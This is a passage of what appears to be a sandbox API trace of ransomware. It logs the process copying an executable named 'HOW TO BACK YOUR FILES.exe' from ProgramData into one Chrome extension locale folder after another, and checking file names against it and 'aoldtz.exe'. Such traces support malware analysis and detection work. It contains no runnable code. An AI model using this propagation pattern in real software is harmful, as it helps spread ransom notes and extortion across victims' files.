YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.903] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.904] GetLastError () returned 0x0 [0104.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.904] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.904] CloseHandle (hObject=0x120) returned 1 [0104.904] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9a09e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9a09e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.904] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.904] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.904] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" [0104.904] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" [0104.904] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.904] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.905] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.905] GetLastError () returned 0x0 [0104.905] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.906] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.906] CloseHandle (hObject=0x120) returned 1 [0104.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9c6b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9c6b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.906] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.906] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.906] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" [0104.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" [0104.906] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.906] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.907] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.907] GetLastError () returned 0x0 [0104.907] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.907] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.907] CloseHandle (hObject=0x120) returned 1 [0104.908] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9c6b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9c6b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.908] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.908] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.908] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" [0104.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" [0104.908] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.908] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.909] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.909] GetLastError () returned 0x0 [0104.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.909] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.909] CloseHandle (hObject=0x120) returned 1 [0104.909] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9c6b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9c6b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.910] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.910] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.910] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" [0104.910] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" [0104.910] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.910] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.911] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.911] GetLastError () returned 0x0 [0104.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.911] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.911] CloseHandle (hObject=0x120) returned 1 [0104.911] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9ecca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9ecca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.911] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.911] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.912] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" [0104.912] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" [0104.912] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.912] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.912] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.913] GetLastError () returned 0x0 [0104.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.913] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.913] CloseHandle (hObject=0x120) returned 1 [0104.913] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da12e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da12e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.913] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.913] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.913] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" [0104.914] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" [0104.914] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.914] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.914] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.915] GetLastError () returned 0x0 [0104.915] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.915] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.915] CloseHandle (hObject=0x120) returned 1 [0104.915] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da12e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da12e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.915] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.915] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.915] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" [0104.915] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" [0104.915] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.915] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User 